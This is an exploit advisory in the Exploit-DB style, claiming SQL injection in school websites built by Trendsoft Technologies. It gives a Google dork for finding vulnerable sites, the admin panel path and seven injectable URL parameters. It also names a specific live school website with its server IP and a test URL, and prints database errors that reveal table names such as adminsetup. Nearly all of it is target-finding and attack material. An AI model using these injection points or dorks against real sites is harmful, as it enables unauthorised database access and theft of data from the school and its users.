############################################################
# Exploit Title : Trendsoft Technologies India SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 08/01/2019
# Vendor Homepage : trendsoft.info
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Designed & Maintained by Trendsoft Technologies''
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
############################################################
# Admin Panel Login Path :
***********************
/admin/
# SQL Injection Exploit :
*********************
/page_detail.php?sid=Njk=&pid=NTA=[SQL Injection]
/contact_us.php?sid=NQ==[SQL Injection]
/principal_message.php?sid=Mg==[SQL Injection]
/alumni_gallery.php?pid=MQ==[SQL Injection]
/kg_gallery.php?pid=MQ==[SQL Injection]
/video_gallery.php?pid=Ng==[SQL Injection]
/onlineapp/AdmFormfatima.php?id=[SQL Injection]
############################################################
# Example Vulnerable Site =>
**************************
Note => (103.92.235.205) => There are 7 domains hosted on this server.
[+] fatimaconventschool.com/page_detail.php?sid=Njk=&pid=NTA=1%27
[Proof of Concept ] => archive.fo/0S8I0
############################################################
# SQL Database Error :
*********************
cannot execute query select staticId,parentId,staticTitle,externalLink from
tbl_fatima_static_pages where enable='Activate' and parentId=505 order by
orderOfAppearance ascYou have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right
syntax to use near order by orderOfAppearance asc' at line 1
select * from adminsetup where class=
You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use near '' at line 1
############################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
############################################################